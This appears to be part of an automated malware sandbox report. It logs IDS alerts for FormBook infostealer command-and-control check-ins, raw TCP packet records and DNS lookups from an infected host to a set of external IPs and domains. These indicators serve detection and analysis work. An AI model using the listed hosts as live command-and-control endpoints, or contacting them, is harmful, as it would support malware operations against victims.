                                              2024-09-25T12:47:00.696604+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49742 | 172.96.187.60 | 80 | TCP
                                              2024-09-25T12:47:03.240302+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 172.96.187.60 | 80 | TCP
                                              2024-09-25T12:47:05.798338+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49744 | 172.96.187.60 | 80 | TCP
                                              2024-09-25T12:47:08.338133+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49745 | 172.96.187.60 | 80 | TCP
                                              2024-09-25T12:47:08.338133+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49745 | 172.96.187.60 | 80 | TCP
                                              2024-09-25T12:47:13.838742+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49746 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:47:17.316782+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49747 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:47:20.010252+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49748 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:47:21.516611+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:47:21.516611+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:47:27.411768+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49750 | 67.223.117.189 | 80 | TCP
                                              2024-09-25T12:47:29.890026+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49751 | 67.223.117.189 | 80 | TCP
                                              2024-09-25T12:47:32.412218+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49752 | 67.223.117.189 | 80 | TCP
                                              2024-09-25T12:47:34.943685+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49753 | 67.223.117.189 | 80 | TCP
                                              2024-09-25T12:47:34.943685+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49753 | 67.223.117.189 | 80 | TCP
                                              2024-09-25T12:47:41.807158+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49754 | 103.248.137.209 | 80 | TCP
                                              2024-09-25T12:47:44.354366+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49755 | 103.248.137.209 | 80 | TCP
                                              2024-09-25T12:47:46.904785+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49756 | 103.248.137.209 | 80 | TCP
                                              2024-09-25T12:48:09.394601+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49757 | 103.248.137.209 | 80 | TCP
                                              2024-09-25T12:48:09.394601+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49757 | 103.248.137.209 | 80 | TCP
                                              2024-09-25T12:48:22.972850+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49758 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:25.532954+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49759 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:28.066243+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49760 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:30.640903+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:30.640903+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:37.387909+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49762 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:39.932241+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49763 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:41.416916+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49764 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:43.979967+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49765 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:43.979967+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49765 | 3.33.130.190 | 80 | TCP
                                              2024-09-25T12:48:49.969654+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49766 | 85.153.138.113 | 80 | TCP
                                              2024-09-25T12:48:52.523896+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49767 | 85.153.138.113 | 80 | TCP
                                              2024-09-25T12:48:55.215174+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49768 | 85.153.138.113 | 80 | TCP
                                              2024-09-25T12:48:57.629655+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49769 | 85.153.138.113 | 80 | TCP
                                              2024-09-25T12:48:57.629655+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49769 | 85.153.138.113 | 80 | TCP
                                              2024-09-25T12:49:03.768976+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49770 | 104.21.11.31 | 80 | TCP
                                              2024-09-25T12:49:06.298093+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49771 | 104.21.11.31 | 80 | TCP
                                              2024-09-25T12:49:09.089476+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49772 | 104.21.11.31 | 80 | TCP
                                              2024-09-25T12:49:11.931245+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49773 | 104.21.11.31 | 80 | TCP
                                              2024-09-25T12:49:11.931245+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49773 | 104.21.11.31 | 80 | TCP
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Sep 25, 2024 12:46:52.650767088 CEST4973980192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:53.670685053 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.349356890 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.349723101 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.357356071 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.362328053 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.950181007 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.950196981 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.950206995 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.950373888 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.955832005 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.961429119 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:47:00.237888098 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:00.242842913 CEST8049742172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:00.242919922 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:00.253182888 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:00.258025885 CEST8049742172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:00.696494102 CEST8049742172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:00.696511984 CEST8049742172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:00.696604013 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:01.761370897 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:02.778814077 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:02.783682108 CEST8049743172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:02.783791065 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:02.794791937 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:02.799645901 CEST8049743172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:03.239924908 CEST8049743172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:03.240220070 CEST8049743172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:03.240302086 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:04.307553053 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:05.326919079 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:05.332516909 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.332601070 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:05.344904900 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:05.352102041 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352117062 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352128029 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352139950 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352152109 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352205992 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352219105 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352230072 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352241993 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.797883034 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.798288107 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.798337936 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:06.853897095 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:07.873565912 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:07.878520966 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:07.878652096 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:07.887039900 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:07.891868114 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:08.337837934 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:08.337918043 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:08.338133097 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:08.342025995 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:08.350539923 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:13.375998020 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:13.384107113 CEST80497463.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:13.384177923 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:13.400037050 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:13.404890060 CEST80497463.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:13.838654041 CEST80497463.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:13.838742018 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:14.916475058 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:14.921328068 CEST80497463.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:15.936326981 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:15.941230059 CEST80497473.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:15.941307068 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:15.956368923 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:15.961257935 CEST80497473.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:17.316632986 CEST80497473.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:17.316781998 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:17.463530064 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:17.468610048 CEST80497473.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.481421947 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:18.489424944 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.489515066 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:18.498404026 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:18.506987095 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.506999969 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.507006884 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.507083893 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.507091999 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.508768082 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.508778095 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.508780956 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.509174109 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:20.010251999 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:20.015778065 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:20.015984058 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.053649902 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.058702946 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:21.058805943 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.065594912 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.070488930 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:21.516455889 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:21.516558886 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:21.516611099 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.519119978 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.526412964 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:26.724991083 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:26.729835033 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:26.730005026 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:26.743124962 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:26.747953892 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411669016 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411685944 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411695957 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411706924 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411719084 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411729097 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411741018 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411752939 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411763906 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411767960 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.411767960 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.411773920 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411787033 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411820889 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.411820889 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.416769981 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.416846991 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.416920900 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.446911097 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.446991920 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447026968 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447036028 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.447062969 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447082996 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.447101116 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447254896 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.447293043 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447325945 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447380066 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447386026 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.447429895 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447463989 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447484016 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.448113918 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448164940 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448167086 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.448200941 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448234081 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448268890 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448318005 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.448318005 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.448901892 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.449425936 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:28.244560957 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.271991968 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.278112888 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.278209925 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.288917065 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.293889999 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.889935017 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.889986038 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890003920 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890019894 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890026093 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.890037060 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890053034 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.890053988 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890072107 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890085936 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890089035 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.890101910 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890119076 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890120983 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.890166998 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.897145987 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.897180080 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.897213936 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.897228003 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.897366047 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.897409916 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.897495985 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.947614908 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.983624935 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983655930 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983689070 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983711958 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.983721018 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983755112 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983760118 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.983789921 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983838081 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.985042095 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.985074997 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.985110044 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.985116959 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.985194921 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.985240936 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.986046076 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986078024 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986112118 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986120939 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.986195087 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986231089 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.986852884 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986884117 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986936092 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:30.791532993 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:31.811156034 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:31.816095114 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.816159964 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:31.831346035 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:31.836272955 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836299896 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836323023 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836334944 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836348057 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836476088 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836507082 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836519003 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836545944 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412100077 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412146091 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412180901 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412214041 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412218094 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.412250042 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412261963 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.412281036 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412313938 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412321091 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.412348032 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412381887 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412411928 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.412508011 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412545919 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.417418957 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.417453051 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.417486906 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.417501926 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.417521954 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.417565107 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.499484062 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499527931 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499552011 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499566078 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499581099 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499594927 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499593973 CEST4975280192.168.2.467.223.117.189
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 12:46:29.240736961 CEST | 192.168.2.4 | 1.1.1.1 | 0x2670 | Standard query (0) | www.2bhp.com | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:46:45.061227083 CEST | 192.168.2.4 | 1.1.1.1 | 0xb222 | Standard query (0) | www.ultraleap.net | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:46:59.967919111 CEST | 192.168.2.4 | 1.1.1.1 | 0xae14 | Standard query (0) | www.dalong.site | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:47:13.358769894 CEST | 192.168.2.4 | 1.1.1.1 | 0x3765 | Standard query (0) | www.mgeducacaopro.online | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:47:26.543175936 CEST | 192.168.2.4 | 1.1.1.1 | 0xde8b | Standard query (0) | www.heldhold.xyz | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:47:40.046143055 CEST | 192.168.2.4 | 1.1.1.1 | 0x89ff | Standard query (0) | www.63582.photo | A (IP address) | IN (0x0001) | false
